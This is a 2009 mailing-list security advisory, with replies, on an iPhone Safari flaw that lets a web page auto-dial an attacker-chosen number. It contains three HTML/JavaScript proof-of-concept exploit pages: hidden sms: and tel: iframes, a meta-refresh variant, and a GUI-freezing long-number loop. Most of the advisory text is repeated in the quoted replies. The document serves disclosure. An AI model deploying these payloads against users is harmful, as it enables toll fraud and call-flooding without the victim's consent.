iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)

Released since Apple published the iPhone 3.0 security fixes.

Vulnerability Report

--- BEGIN ADVISORY ---

Manufacturer: Apple (www.apple.com)
Device:       iPhone 3G (iPhone 1st Gen)
Firmware:     2.1 (possible earlier versions)
Device Type:  smart phone

Subsystems: Safari (and mobile telephony)

-----------------------------

Short name:
   iPhone Safari phone-auto-dial (vulnerability)

Vulnerability class:
   application logic bug

Executive Summary:
   A malicious website can initiate a phone call without the need of user
   interaction. The destination phone number is chosen by the attacker.

Risk: MEDIUM-HIGH
   Medium to high risk due to the possibility of financial gain through
   this attack by calling of premium rate numbers (e.g. 1-900 in the
   U.S.). Denial-of-service against arbitrary phone numbers through
   mass-calling. User cannot prevent attack.

-----------------------------

Reporter: Collin Mulliner <collin[AT]mulliner.org>

-----------------------------

Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)

-----------------------------

Time line:

   Oct. 20. 2008: Reported vulnerability to vendor.
   Oct. 20. 2008: Vendor acknowledges receiving our email.
                  Not commenting on the vulnerability itself.
   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
   Oct. 30. 2008: Sent additional information.
   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
                  version.
   Nov. 20. 2008: Public disclosure.
   Jun. 18. 2009: Full-Disclosure.

-----------------------------

Fix:

   iPhone OS 2.2
   iPhone OS 2.2.1
   iPhone OS 3.0
	
-----------------------------

Technical Details:

   The Safari version running on the iPhone supports handling the TEL [1]
   protocol through launching the telephony/dialer application. This is
   done by passing the provided phone number to the telephony
   application. Under normal conditions, loading a tel: URI results in a
   message box asking the users permission to call the given number. The
   user is presented with the simple choice to either press call or
   cancel.

   A TEL URI can be opened automatically if the TEL URI is used as the
   source of an HTML iframe or frame, as the URL of a meta refresh, as
   the location of a HTTP 30X redirect, and as the location of the
   current or a new window using javascript.

   We discovered a security vulnerability that dismisses the "ask for
   permission to call" dialog in a way that chooses the "call" option
   rather than the "cancel" option.
	
   This condition occurs if a TEL URI is activated at the same time
   Safari is closed by launching an external application, for example
   launching the SMS application (in order to handle a SMS URI [2]). The
   SMS application can be launched through placing a SMS URI as the
   source of an iframe. This is shown in the first proof-of-concept
   exploit below.
	
   Further investigation showed that this behavior can be reproduced by
   launching other applications such as: Maps, YouTube, and iTunes.
   Launching these applications can be achieved through loading special
   URLs using the meta refresh tag. This is shown in the second
   proof-of-concept exploit below.

   We also discovered that the bug can also be triggered through popup
   windows (e.g. javascript alert). In this situation the initiating app
   does not need to be termianted in order to active the call.
	
   Finally, we discovered a second bug that can be used to perform
   malicious phone calls that cannot be prevented or canceled by the
   victim. This bug allows the attacker to freez the GUI (graphical user
   interface) for a number of seconds. While the GUI is frozen the call
   progresses in	the background and cannot be stopped by the victim user.
   Freezing the GUI is achieved by passing a "very long" phone number to
   the SMS application. The SMS application, immediately after being
   started, freezes the iPhone GUI. Also switching off the iPhone cannot
   be performed fast enough in order to prevent the malicious call.
	

   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04

-----------------------------

Further Discussion:

   The dialing dialog is clearly shown to the user also the user, in most
   cases, cant press cancel quick enough in order to stop the initiation
   of the call. Once the external application is launched, the telephony
   application is running in the background performing the call. Only
   the call forwarding dialog (containing the "dismiss" button) indicates
   a call being made.

-----------------------------

Proof-of-Concept with plain HTML using the SMS application:

   <html>
   <head>
   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
   </title>
   </head>
   <body>
   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
   <!-- second iframe is to attack quick users who manage to close the
        first call-dialog //-->
   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
   </body>
   </html>

Proof-of-Concept using javascript and the Maps application:

   <html>
   <head>
   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
   </title>
   <meta http-equiv="refresh" content="0;
   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
   </head>
   <body>
   <script lang=javascript>
   function a() {
    document.write("<iframe src="tel:+14089748388" WIDTH=50 
HEIGHT=10></iframe>");
   }
   setTimeout("a()", 100);
   </script>
   </body>
   </html>
	
Proof-of-Concept attack where the victim user cannot stop the malicious 
phone call:

   <html>
   <head>
   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
   </title>
   </head>
   <body>
   <script lang=javascript>
   l = "<iframe src="sms:";
   for (i = 0; i < 10000; i++) {
           l = l + "3340948034298232";
   }
   l = l + "" width=10 height=10></iframe><iframe
   src="tel:+14089748388" height=10 width=10></iframe>";
   document.write(l);
   </script>
   </body>
   </html>

-----------------------------

More Detailed Information:

  Demo video available at:
   http://www.mulliner.org/iphone/

  Advisories:
   http://www.mulliner.org/security/advisories/

--- END ADVISORY ---


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
does!


Replies to this exploit:

From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
